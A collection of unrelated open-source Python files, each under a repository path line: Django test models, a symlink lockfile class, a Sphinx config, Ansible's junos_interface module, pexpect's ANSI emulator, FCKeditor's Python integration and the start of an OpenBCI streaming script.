""" name = models.CharField(max_length=50) mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') class PersonTwoImages(models.Model): """ Model that: * Defines two ImageFields * Defines the height/width fields before the ImageFields * Has a nullalble ImageField """ name = models.CharField(max_length=50) mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') headshot_height = models.PositiveSmallIntegerField( blank=True, null=True) headshot_width = models.PositiveSmallIntegerField( blank=True, null=True) headshot = TestImageField(blank=True, null=True, storage=temp_storage, upload_to='tests', height_field='headshot_height', width_field='headshot_width') class AllFieldsModel(models.Model): big_integer = models.BigIntegerField() binary = models.BinaryField() boolean = models.BooleanField(default=False) char = models.CharField(max_length=10) csv = models.CommaSeparatedIntegerField(max_length=10) date = models.DateField() datetime = models.DateTimeField() decimal = models.DecimalField(decimal_places=2, max_digits=2) duration = models.DurationField() email = models.EmailField() file_path = models.FilePathField() floatf = models.FloatField() integer = models.IntegerField() generic_ip = models.GenericIPAddressField() null_boolean = models.NullBooleanField() positive_integer = models.PositiveIntegerField() positive_small_integer = models.PositiveSmallIntegerField() slug = models.SlugField() small_integer = models.SmallIntegerField() text = models.TextField() time = models.TimeField() url = models.URLField() uuid = models.UUIDField() fo = ForeignObject( 'self', on_delete=models.CASCADE, from_fields=['abstract_non_concrete_id'], 
to_fields=['id'], related_name='reverse' ) fk = ForeignKey( 'self', models.CASCADE, related_name='reverse2' ) m2m = ManyToManyField('self') oto = OneToOneField('self', models.CASCADE) object_id = models.PositiveIntegerField() content_type = models.ForeignKey(ContentType, models.CASCADE) gfk = GenericForeignKey() gr = GenericRelation(DataModel) ############################################################################### class UUIDModel(models.Model): field = models.UUIDField() class NullableUUIDModel(models.Model): field = models.UUIDField(blank=True, null=True) class PrimaryKeyUUIDModel(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4) class RelatedToUUIDModel(models.Model): uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE) class UUIDChild(PrimaryKeyUUIDModel): pass class UUIDGrandchild(UUIDChild): pass
judotens/jongos
refs/heads/master
lockfile/symlinklockfile.py
12
from __future__ import absolute_import

import time
import os

from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
               AlreadyLocked)


class SymlinkLockFile(LockBase):
    """Lock access to a file using symlink(2).

    The lock is held while ``self.lock_file`` is a symlink whose target is
    this locker's ``unique_name``; symlink creation is atomic, so only one
    contender can ever create it.
    """

    def __init__(self, path, threaded=True, timeout=None):
        # super(SymlinkLockFile).__init(...)
        LockBase.__init__(self, path, threaded, timeout)
        # split it back!
        # Only the basename is kept: it is used as the symlink *target* and
        # compared against os.readlink() in i_am_locking().
        self.unique_name = os.path.split(self.unique_name)[1]

    def acquire(self, timeout=None):
        # Hopefully unnecessary for symlink.
        # try:
        #     open(self.unique_name, "wb").close()
        # except IOError:
        #     raise LockFailed("failed to create %s" % self.unique_name)
        timeout = timeout or self.timeout
        end_time = time.time()
        if timeout is not None and timeout > 0:
            end_time += timeout
        while True:
            # Try and create a symbolic link to it.
            try:
                os.symlink(self.unique_name, self.lock_file)
            except OSError:
                # Link creation failed.  Maybe we've double-locked?
                if self.i_am_locking():
                    # Linked to our unique name.  Proceed.
                    return
                else:
                    # Otherwise the lock creation failed.
                    if timeout is not None and time.time() > end_time:
                        # timeout > 0: we waited and ran out of time.
                        # timeout <= 0: non-blocking attempt; fail at once.
                        if timeout > 0:
                            raise LockTimeout("Timeout waiting to acquire"
                                              " lock for %s" % self.path)
                        else:
                            raise AlreadyLocked("%s is already locked" %
                                                self.path)
                    # Poll at timeout/10, or every 100 ms when blocking
                    # indefinitely.
                    time.sleep(timeout/10 if timeout is not None else 0.1)
            else:
                # Link creation succeeded.  We're good to go.
                return

    def release(self):
        # Refuse to release locks we don't hold rather than silently
        # clobbering another process's lock.
        if not self.is_locked():
            raise NotLocked("%s is not locked" % self.path)
        elif not self.i_am_locking():
            raise NotMyLock("%s is locked, but not by me" % self.path)
        os.unlink(self.lock_file)

    def is_locked(self):
        # Locked by *someone* iff the symlink exists.
        return os.path.islink(self.lock_file)

    def i_am_locking(self):
        # Locked by *us* iff the symlink exists and points at our name.
        return os.path.islink(self.lock_file) and \
            os.readlink(self.lock_file) == self.unique_name

    def break_lock(self):
        # Forcibly remove the lock regardless of owner.
        if os.path.islink(self.lock_file):  # exists && link
            os.unlink(self.lock_file)
sriharrsha/flipside.io
refs/heads/master
vendor/guzzlehttp/ringphp/docs/conf.py
321
# Sphinx configuration for the RingPHP documentation.
import sys
import os

import sphinx_rtd_theme
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer

# Highlight bare PHP snippets (no leading <?php tag) and show line numbers,
# both for plain ``php`` blocks and annotation-style listings.
for alias in ('php', 'php-annotations'):
    lexers[alias] = PhpLexer(startinline=True, linenos=1)

# Unprefixed directives/roles default to the PHP domain.
primary_domain = 'php'

# -- General configuration ---------------------------------------------------
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'RingPHP'
copyright = u'2014, Michael Dowling'
version = '1.0.0-alpha'
exclude_patterns = ['_build']

# -- HTML output -------------------------------------------------------------
html_title = "RingPHP"
html_short_title = "RingPHP"
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
caveman-dick/ansible
refs/heads/devel
lib/ansible/modules/network/junos/junos_interface.py
16
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2017, Ansible by Red Hat, inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = """ --- module: junos_interface version_added: "2.4" author: "Ganesh Nalawade (@ganeshrn)" short_description: Manage Interface on Juniper JUNOS network devices description: - This module provides declarative management of Interfaces on Juniper JUNOS network devices. options: name: description: - Name of the Interface. required: true description: description: - Description of Interface. enabled: description: - Configure interface link status. speed: description: - Interface link speed. mtu: description: - Maximum size of transmit packet. duplex: description: - Interface link status. default: auto choices: ['full', 'half', 'auto'] tx_rate: description: - Transmit rate in bits per second (bps). rx_rate: description: - Receiver rate in bits per second (bps). neighbors: description: - Check the operational state of given interface C(name) for LLDP neighbor. - The following suboptions are available. suboptions: host: description: - "LLDP neighbor host for given interface C(name)." port: description: - "LLDP neighbor port to which given interface C(name) is connected." delay: description: - Time in seconds to wait before checking for the operational state on remote device. This wait is applicable for operational state argument which are I(state) with values C(up)/C(down), I(tx_rate) and I(rx_rate). default: 10 aggregate: description: List of Interfaces definitions. 
state: description: - State of the Interface configuration, C(up) idicates present and operationally up and C(down) indicates present and operationally C(down) default: present choices: ['present', 'absent', 'up', 'down'] active: description: - Specifies whether or not the configuration is active or deactivated default: True choices: [True, False] requirements: - ncclient (>=v0.5.2) notes: - This module requires the netconf system service be enabled on the remote device being managed. - Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4. """ EXAMPLES = """ - name: configure interface junos_interface: name: ge-0/0/1 description: test-interface - name: remove interface junos_interface: name: ge-0/0/1 state: absent - name: make interface down junos_interface: name: ge-0/0/1 enabled: False - name: make interface up junos_interface: name: ge-0/0/1 enabled: True - name: Deactivate interface config junos_interface: name: ge-0/0/1 state: present active: False - name: Activate interface config net_interface: name: ge-0/0/1 state: present active: True - name: Configure interface speed, mtu, duplex junos_interface: name: ge-0/0/1 state: present speed: 1g mtu: 256 duplex: full - name: Create interface using aggregate junos_interface: aggregate: - name: ge-0/0/1 description: test-interface-1 - name: ge-0/0/2 description: test-interface-2 speed: 1g duplex: full mtu: 512 - name: Delete interface using aggregate junos_interface: aggregate: - name: ge-0/0/1 - name: ge-0/0/2 state: absent - name: Check intent arguments junos_interface: name: "{{ name }}" state: up tx_rate: ge(0) rx_rate: le(0) - name: Check neighbor intent junos_interface: name: xe-0/1/1 neighbors: - port: Ethernet1/0/1 host: netdev - name: Config + intent junos_interface: name: "{{ name }}" enabled: False state: down """ RETURN = """ diff.prepared: description: Configuration difference before and after applying change. 
returned: when configuration is changed and diff option is enabled. type: string sample: > [edit interfaces] + ge-0/0/1 { + description test-interface; + } """ import collections from copy import deepcopy from time import sleep from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.netconf import send_request from ansible.module_utils.network_common import remove_default_spec from ansible.module_utils.network_common import conditional from ansible.module_utils.junos import junos_argument_spec, check_args from ansible.module_utils.junos import load_config, map_params_to_obj, map_obj_to_ele from ansible.module_utils.junos import commit_configuration, discard_changes, locked_config, to_param_list try: from lxml.etree import Element, SubElement, tostring except ImportError: from xml.etree.ElementTree import Element, SubElement, tostring USE_PERSISTENT_CONNECTION = True def validate_mtu(value, module): if value and not 256 <= value <= 9192: module.fail_json(msg='mtu must be between 256 and 9192') def validate_param_values(module, obj, param=None): if not param: param = module.params for key in obj: # validate the param value (if validator func exists) validator = globals().get('validate_%s' % key) if callable(validator): validator(param.get(key), module) def main(): """ main entry point for module execution """ neighbors_spec = dict( host=dict(), port=dict() ) element_spec = dict( name=dict(), description=dict(), enabled=dict(default=True, type='bool'), speed=dict(), mtu=dict(type='int'), duplex=dict(choices=['full', 'half', 'auto']), tx_rate=dict(), rx_rate=dict(), neighbors=dict(type='list', elements='dict', options=neighbors_spec), delay=dict(default=10, type='int'), state=dict(default='present', choices=['present', 'absent', 'up', 'down']), active=dict(default=True, type='bool') ) aggregate_spec = deepcopy(element_spec) aggregate_spec['name'] = dict(required=True) # remove default in aggregate spec, to handle common arguments 
remove_default_spec(aggregate_spec) argument_spec = dict( aggregate=dict(type='list', elements='dict', options=aggregate_spec), ) argument_spec.update(element_spec) argument_spec.update(junos_argument_spec) required_one_of = [['name', 'aggregate']] mutually_exclusive = [['name', 'aggregate']] module = AnsibleModule(argument_spec=argument_spec, required_one_of=required_one_of, mutually_exclusive=mutually_exclusive, supports_check_mode=True) warnings = list() check_args(module, warnings) result = {'changed': False} if warnings: result['warnings'] = warnings top = 'interfaces/interface' param_to_xpath_map = collections.OrderedDict() param_to_xpath_map.update([ ('name', {'xpath': 'name', 'is_key': True}), ('description', 'description'), ('speed', 'speed'), ('mtu', 'mtu'), ('duplex', 'link-mode'), ('disable', {'xpath': 'disable', 'tag_only': True}) ]) choice_to_value_map = { 'link-mode': {'full': 'full-duplex', 'half': 'half-duplex', 'auto': 'automatic'} } params = to_param_list(module) requests = list() for param in params: # if key doesn't exist in the item, get it from module.params for key in param: if param.get(key) is None: param[key] = module.params[key] item = param.copy() state = item.get('state') item['disable'] = True if not item.get('enabled') else False if state in ('present', 'up', 'down'): item['state'] = 'present' validate_param_values(module, param_to_xpath_map, param=item) want = map_params_to_obj(module, param_to_xpath_map, param=item) requests.append(map_obj_to_ele(module, want, top, value_map=choice_to_value_map, param=item)) diff = None with locked_config(module): for req in requests: diff = load_config(module, tostring(req), warnings, action='merge') # issue commit after last configuration change is done commit = not module.check_mode if diff: if commit: commit_configuration(module) else: discard_changes(module) result['changed'] = True if module._diff: result['diff'] = {'prepared': diff} failed_conditions = [] neighbors = None for item in params: 
state = item.get('state') tx_rate = item.get('tx_rate') rx_rate = item.get('rx_rate') want_neighbors = item.get('neighbors') if state not in ('up', 'down') and tx_rate is None and rx_rate is None and want_neighbors is None: continue element = Element('get-interface-information') intf_name = SubElement(element, 'interface-name') intf_name.text = item.get('name') if result['changed']: sleep(item.get('delay')) reply = send_request(module, element, ignore_warning=False) if state in ('up', 'down'): admin_status = reply.xpath('interface-information/physical-interface/admin-status') if not admin_status or not conditional(state, admin_status[0].text.strip()): failed_conditions.append('state ' + 'eq(%s)' % state) if tx_rate: output_bps = reply.xpath('interface-information/physical-interface/traffic-statistics/output-bps') if not output_bps or not conditional(tx_rate, output_bps[0].text.strip(), cast=int): failed_conditions.append('tx_rate ' + tx_rate) if rx_rate: input_bps = reply.xpath('interface-information/physical-interface/traffic-statistics/input-bps') if not input_bps or not conditional(rx_rate, input_bps[0].text.strip(), cast=int): failed_conditions.append('rx_rate ' + rx_rate) if want_neighbors: if neighbors is None: element = Element('get-lldp-interface-neighbors') intf_name = SubElement(element, 'interface-device') intf_name.text = item.get('name') reply = send_request(module, element, ignore_warning=False) have_host = [item.text for item in reply.xpath('lldp-neighbors-information/lldp-neighbor-information/lldp-remote-system-name')] have_port = [item.text for item in reply.xpath('lldp-neighbors-information/lldp-neighbor-information/lldp-remote-port-id')] for neighbor in want_neighbors: host = neighbor.get('host') port = neighbor.get('port') if host and host not in have_host: failed_conditions.append('host ' + host) if port and port not in have_port: failed_conditions.append('port ' + port) if failed_conditions: msg = 'One or more conditional statements have not 
be satisfied' module.fail_json(msg=msg, failed_conditions=failed_conditions) module.exit_json(**result) if __name__ == "__main__": main()
XXMrHyde/android_external_chromium_org
refs/heads/darkkat-4.4
third_party/pexpect/ANSI.py
171
"""This implements an ANSI (VT100) terminal emulator as a subclass of screen. PEXPECT LICENSE This license is approved by the OSI and FSF as GPL-compatible. http://opensource.org/licenses/isc-license.txt Copyright (c) 2012, Noah Spurrier <noah@noah.org> PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ # references: # http://en.wikipedia.org/wiki/ANSI_escape_code # http://www.retards.org/terminals/vt102.html # http://vt100.net/docs/vt102-ug/contents.html # http://vt100.net/docs/vt220-rm/ # http://www.termsys.demon.co.uk/vtansi.htm import screen import FSM import copy import string # # The 'Do.*' functions are helper functions for the ANSI class. 
# def DoEmit (fsm): screen = fsm.memory[0] screen.write_ch(fsm.input_symbol) def DoStartNumber (fsm): fsm.memory.append (fsm.input_symbol) def DoBuildNumber (fsm): ns = fsm.memory.pop() ns = ns + fsm.input_symbol fsm.memory.append (ns) def DoBackOne (fsm): screen = fsm.memory[0] screen.cursor_back () def DoBack (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_back (count) def DoDownOne (fsm): screen = fsm.memory[0] screen.cursor_down () def DoDown (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_down (count) def DoForwardOne (fsm): screen = fsm.memory[0] screen.cursor_forward () def DoForward (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_forward (count) def DoUpReverse (fsm): screen = fsm.memory[0] screen.cursor_up_reverse() def DoUpOne (fsm): screen = fsm.memory[0] screen.cursor_up () def DoUp (fsm): count = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_up (count) def DoHome (fsm): c = int(fsm.memory.pop()) r = int(fsm.memory.pop()) screen = fsm.memory[0] screen.cursor_home (r,c) def DoHomeOrigin (fsm): c = 1 r = 1 screen = fsm.memory[0] screen.cursor_home (r,c) def DoEraseDown (fsm): screen = fsm.memory[0] screen.erase_down() def DoErase (fsm): arg = int(fsm.memory.pop()) screen = fsm.memory[0] if arg == 0: screen.erase_down() elif arg == 1: screen.erase_up() elif arg == 2: screen.erase_screen() def DoEraseEndOfLine (fsm): screen = fsm.memory[0] screen.erase_end_of_line() def DoEraseLine (fsm): arg = int(fsm.memory.pop()) screen = fsm.memory[0] if arg == 0: screen.erase_end_of_line() elif arg == 1: screen.erase_start_of_line() elif arg == 2: screen.erase_line() def DoEnableScroll (fsm): screen = fsm.memory[0] screen.scroll_screen() def DoCursorSave (fsm): screen = fsm.memory[0] screen.cursor_save_attrs() def DoCursorRestore (fsm): screen = fsm.memory[0] screen.cursor_restore_attrs() def DoScrollRegion (fsm): screen = fsm.memory[0] r2 = int(fsm.memory.pop()) r1 = 
int(fsm.memory.pop()) screen.scroll_screen_rows (r1,r2) def DoMode (fsm): screen = fsm.memory[0] mode = fsm.memory.pop() # Should be 4 # screen.setReplaceMode () def DoLog (fsm): screen = fsm.memory[0] fsm.memory = [screen] fout = open ('log', 'a') fout.write (fsm.input_symbol + ',' + fsm.current_state + '\n') fout.close() class term (screen.screen): """This class is an abstract, generic terminal. This does nothing. This is a placeholder that provides a common base class for other terminals such as an ANSI terminal. """ def __init__ (self, r=24, c=80): screen.screen.__init__(self, r,c) class ANSI (term): """This class implements an ANSI (VT100) terminal. It is a stream filter that recognizes ANSI terminal escape sequences and maintains the state of a screen object. """ def __init__ (self, r=24,c=80): term.__init__(self,r,c) #self.screen = screen (24,80) self.state = FSM.FSM ('INIT',[self]) self.state.set_default_transition (DoLog, 'INIT') self.state.add_transition_any ('INIT', DoEmit, 'INIT') self.state.add_transition ('\x1b', 'INIT', None, 'ESC') self.state.add_transition_any ('ESC', DoLog, 'INIT') self.state.add_transition ('(', 'ESC', None, 'G0SCS') self.state.add_transition (')', 'ESC', None, 'G1SCS') self.state.add_transition_list ('AB012', 'G0SCS', None, 'INIT') self.state.add_transition_list ('AB012', 'G1SCS', None, 'INIT') self.state.add_transition ('7', 'ESC', DoCursorSave, 'INIT') self.state.add_transition ('8', 'ESC', DoCursorRestore, 'INIT') self.state.add_transition ('M', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('>', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('<', 'ESC', DoUpReverse, 'INIT') self.state.add_transition ('=', 'ESC', None, 'INIT') # Selects application keypad. self.state.add_transition ('#', 'ESC', None, 'GRAPHICS_POUND') self.state.add_transition_any ('GRAPHICS_POUND', None, 'INIT') self.state.add_transition ('[', 'ESC', None, 'ELB') # ELB means Escape Left Bracket. 
That is ^[[ self.state.add_transition ('H', 'ELB', DoHomeOrigin, 'INIT') self.state.add_transition ('D', 'ELB', DoBackOne, 'INIT') self.state.add_transition ('B', 'ELB', DoDownOne, 'INIT') self.state.add_transition ('C', 'ELB', DoForwardOne, 'INIT') self.state.add_transition ('A', 'ELB', DoUpOne, 'INIT') self.state.add_transition ('J', 'ELB', DoEraseDown, 'INIT') self.state.add_transition ('K', 'ELB', DoEraseEndOfLine, 'INIT') self.state.add_transition ('r', 'ELB', DoEnableScroll, 'INIT') self.state.add_transition ('m', 'ELB', None, 'INIT') self.state.add_transition ('?', 'ELB', None, 'MODECRAP') self.state.add_transition_list (string.digits, 'ELB', DoStartNumber, 'NUMBER_1') self.state.add_transition_list (string.digits, 'NUMBER_1', DoBuildNumber, 'NUMBER_1') self.state.add_transition ('D', 'NUMBER_1', DoBack, 'INIT') self.state.add_transition ('B', 'NUMBER_1', DoDown, 'INIT') self.state.add_transition ('C', 'NUMBER_1', DoForward, 'INIT') self.state.add_transition ('A', 'NUMBER_1', DoUp, 'INIT') self.state.add_transition ('J', 'NUMBER_1', DoErase, 'INIT') self.state.add_transition ('K', 'NUMBER_1', DoEraseLine, 'INIT') self.state.add_transition ('l', 'NUMBER_1', DoMode, 'INIT') ### It gets worse... the 'm' code can have infinite number of ### number;number;number before it. I've never seen more than two, ### but the specs say it's allowed. crap! self.state.add_transition ('m', 'NUMBER_1', None, 'INIT') ### LED control. Same implementation problem as 'm' code. self.state.add_transition ('q', 'NUMBER_1', None, 'INIT') # \E[?47h switch to alternate screen # \E[?47l restores to normal screen from alternate screen. 
self.state.add_transition_list (string.digits, 'MODECRAP', DoStartNumber, 'MODECRAP_NUM') self.state.add_transition_list (string.digits, 'MODECRAP_NUM', DoBuildNumber, 'MODECRAP_NUM') self.state.add_transition ('l', 'MODECRAP_NUM', None, 'INIT') self.state.add_transition ('h', 'MODECRAP_NUM', None, 'INIT') #RM Reset Mode Esc [ Ps l none self.state.add_transition (';', 'NUMBER_1', None, 'SEMICOLON') self.state.add_transition_any ('SEMICOLON', DoLog, 'INIT') self.state.add_transition_list (string.digits, 'SEMICOLON', DoStartNumber, 'NUMBER_2') self.state.add_transition_list (string.digits, 'NUMBER_2', DoBuildNumber, 'NUMBER_2') self.state.add_transition_any ('NUMBER_2', DoLog, 'INIT') self.state.add_transition ('H', 'NUMBER_2', DoHome, 'INIT') self.state.add_transition ('f', 'NUMBER_2', DoHome, 'INIT') self.state.add_transition ('r', 'NUMBER_2', DoScrollRegion, 'INIT') ### It gets worse... the 'm' code can have infinite number of ### number;number;number before it. I've never seen more than two, ### but the specs say it's allowed. crap! self.state.add_transition ('m', 'NUMBER_2', None, 'INIT') ### LED control. Same problem as 'm' code. self.state.add_transition ('q', 'NUMBER_2', None, 'INIT') self.state.add_transition (';', 'NUMBER_2', None, 'SEMICOLON_X') # Create a state for 'q' and 'm' which allows an infinite number of ignored numbers self.state.add_transition_any ('SEMICOLON_X', DoLog, 'INIT') self.state.add_transition_list (string.digits, 'SEMICOLON_X', None, 'NUMBER_X') self.state.add_transition_any ('NUMBER_X', DoLog, 'INIT') self.state.add_transition ('m', 'NUMBER_X', None, 'INIT') self.state.add_transition ('q', 'NUMBER_X', None, 'INIT') self.state.add_transition (';', 'NUMBER_2', None, 'SEMICOLON_X') def process (self, c): self.state.process(c) def process_list (self, l): self.write(l) def write (self, s): for c in s: self.process(c) def flush (self): pass def write_ch (self, ch): """This puts a character at the current cursor position. 
The cursor position is moved forward with wrap-around, but no scrolling is done if the cursor hits the lower-right corner of the screen. """ #\r and \n both produce a call to cr() and lf(), respectively. ch = ch[0] if ch == '\r': self.cr() return if ch == '\n': self.crlf() return if ch == chr(screen.BS): self.cursor_back() return if ch not in string.printable: fout = open ('log', 'a') fout.write ('Nonprint: ' + str(ord(ch)) + '\n') fout.close() return self.put_abs(self.cur_r, self.cur_c, ch) old_r = self.cur_r old_c = self.cur_c self.cursor_forward() if old_c == self.cur_c: self.cursor_down() if old_r != self.cur_r: self.cursor_home (self.cur_r, 1) else: self.scroll_up () self.cursor_home (self.cur_r, 1) self.erase_line() # def test (self): # # import sys # write_text = 'I\'ve got a ferret sticking up my nose.\n' + \ # '(He\'s got a ferret sticking up his nose.)\n' + \ # 'How it got there I can\'t tell\n' + \ # 'But now it\'s there it hurts like hell\n' + \ # 'And what is more it radically affects my sense of smell.\n' + \ # '(His sense of smell.)\n' + \ # 'I can see a bare-bottomed mandril.\n' + \ # '(Slyly eyeing his other nostril.)\n' + \ # 'If it jumps inside there too I really don\'t know what to do\n' + \ # 'I\'ll be the proud posessor of a kind of nasal zoo.\n' + \ # '(A nasal zoo.)\n' + \ # 'I\'ve got a ferret sticking up my nose.\n' + \ # '(And what is worst of all it constantly explodes.)\n' + \ # '"Ferrets don\'t explode," you say\n' + \ # 'But it happened nine times yesterday\n' + \ # 'And I should know for each time I was standing in the way.\n' + \ # 'I\'ve got a ferret sticking up my nose.\n' + \ # '(He\'s got a ferret sticking up his nose.)\n' + \ # 'How it got there I can\'t tell\n' + \ # 'But now it\'s there it hurts like hell\n' + \ # 'And what is more it radically affects my sense of smell.\n' + \ # '(His sense of smell.)' # self.fill('.') # self.cursor_home() # for c in write_text: # self.write_ch (c) # print str(self) # #if __name__ == 
'__main__': # t = ANSI(6,65) # t.test()
seanhennig/chor
refs/heads/master
wp-content/plugins/foliopress-wysiwyg/fckeditor/fckeditor.py
4
""" FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2010 Frederico Caldeira Knabben == BEGIN LICENSE == Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == This is the integration file for Python. """ import cgi import os import re import string def escape(text, replace=string.replace): """Converts the special characters '<', '>', and '&'. RFC 1866 specifies that these characters be represented in HTML as &lt; &gt; and &amp; respectively. In Python 1.5 we use the new string.replace() function for speed. """ text = replace(text, '&', '&amp;') # must be done 1st text = replace(text, '<', '&lt;') text = replace(text, '>', '&gt;') text = replace(text, '"', '&quot;') text = replace(text, "'", '&#39;') return text # The FCKeditor class class FCKeditor(object): def __init__(self, instanceName): self.InstanceName = instanceName self.BasePath = '/fckeditor/' self.Width = '100%' self.Height = '200' self.ToolbarSet = 'Default' self.Value = ''; self.Config = {} def Create(self): return self.CreateHtml() def CreateHtml(self): HtmlValue = escape(self.Value) Html = "" if (self.IsCompatible()): File = "fckeditor.html" Link = "%seditor/%s?InstanceName=%s" % ( self.BasePath, File, self.InstanceName ) if (self.ToolbarSet is not None): Link += "&amp;Toolbar=%s" % self.ToolbarSet # Render the linked hidden field Html += "<input type=\"hidden\" id=\"%s\" name=\"%s\" value=\"%s\" style=\"display:none\" />" % ( self.InstanceName, self.InstanceName, HtmlValue ) # Render the configurations hidden field Html += "<input type=\"hidden\" id=\"%s___Config\" value=\"%s\" style=\"display:none\" />" % ( self.InstanceName, 
self.GetConfigFieldString() ) # Render the editor iframe Html += "<iframe id=\"%s\__Frame\" src=\"%s\" width=\"%s\" height=\"%s\" frameborder=\"0\" scrolling=\"no\"></iframe>" % ( self.InstanceName, Link, self.Width, self.Height ) else: if (self.Width.find("%%") < 0): WidthCSS = "%spx" % self.Width else: WidthCSS = self.Width if (self.Height.find("%%") < 0): HeightCSS = "%spx" % self.Height else: HeightCSS = self.Height Html += "<textarea name=\"%s\" rows=\"4\" cols=\"40\" style=\"width: %s; height: %s;\" wrap=\"virtual\">%s</textarea>" % ( self.InstanceName, WidthCSS, HeightCSS, HtmlValue ) return Html def IsCompatible(self): if (os.environ.has_key("HTTP_USER_AGENT")): sAgent = os.environ.get("HTTP_USER_AGENT", "") else: sAgent = "" if (sAgent.find("MSIE") >= 0) and (sAgent.find("mac") < 0) and (sAgent.find("Opera") < 0): i = sAgent.find("MSIE") iVersion = float(sAgent[i+5:i+5+3]) if (iVersion >= 5.5): return True return False elif (sAgent.find("Gecko/") >= 0): if (re.search(r'Gecko\/\d+\.\d+', sAgent)): return True i = sAgent.find("Gecko/") iVersion = int(sAgent[i+6:i+6+8]) if (iVersion >= 20030210): return True return False elif (sAgent.find("Opera/") >= 0): i = sAgent.find("Opera/") iVersion = float(sAgent[i+6:i+6+4]) if (iVersion >= 9.5): return True return False elif (sAgent.find("AppleWebKit/") >= 0): p = re.compile('AppleWebKit\/(\d+)', re.IGNORECASE) m = p.search(sAgent) if (m.group(1) >= 522): return True return False else: return False def GetConfigFieldString(self): sParams = "" bFirst = True for sKey in self.Config.keys(): sValue = self.Config[sKey] if (not bFirst): sParams += "&amp;" else: bFirst = False if (sValue): k = escape(sKey) v = escape(sValue) if (sValue == "true"): sParams += "%s=true" % k elif (sValue == "false"): sParams += "%s=false" % k else: sParams += "%s=%s" % (k, v) return sParams
olist/correios
refs/heads/master
tests/__init__.py
15
# Copyright 2016 Osvaldo Santana Neto # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
neurotechuoft/MindType
refs/heads/master
Code/V1/src/deprecated/scripts/stream_data.py
1
import sys; sys.path.append('..') # help python find open_bci_v3.py relative to scripts folder import open_bci_v3 as bci import streamer_tcp_server import time, timeit from threading import Thread # Transmit data to openvibe acquisition server, intelpolating data (well, sort of) from 250Hz to 256Hz # Listen to new connections every second using a separate thread. # NB: Left here for resampling algorithm, prefer the use of main.py. NB_CHANNELS = 8 # If > 0 will interpolate based on samples count, typically 1.024 to go from 250Hz to 256Hz SAMPLING_FACTOR = -1.024 # If > 0 will interbolate based on elapsed time SAMPLING_RATE = 256 SERVER_PORT=12345 SERVER_IP="localhost" DEBUG=False # check packet drop last_id = -1 # counter for sampling rate nb_samples_in = -1 nb_samples_out = -1 # last seen values for interpolation last_values = [0] * NB_CHANNELS # counter to trigger duplications... leftover_duplications = 0 tick=timeit.default_timer() # try to ease work for main loop class Monitor(Thread): def __init__(self): Thread.__init__(self) self.nb_samples_in = -1 self.nb_samples_out = -1 # Init time to compute sampling rate self.tick = timeit.default_timer() self.start_tick = self.tick def run(self): while True: # check FPS + listen for new connections new_tick = timeit.default_timer() elapsed_time = new_tick - self.tick current_samples_in = nb_samples_in current_samples_out = nb_samples_out print "--- at t: ", (new_tick - self.start_tick), " ---" print "elapsed_time: ", elapsed_time print "nb_samples_in: ", current_samples_in - self.nb_samples_in print "nb_samples_out: ", current_samples_out - self.nb_samples_out self.tick = new_tick self.nb_samples_in = nb_samples_in self.nb_samples_out = nb_samples_out # time to watch for connection # FIXME: not so great with threads server.check_connections() time.sleep(1) def streamData(sample): global last_values global tick # check packet skipped global last_id # TODO: duplicate packet if skipped to stay sync if sample.id != last_id + 
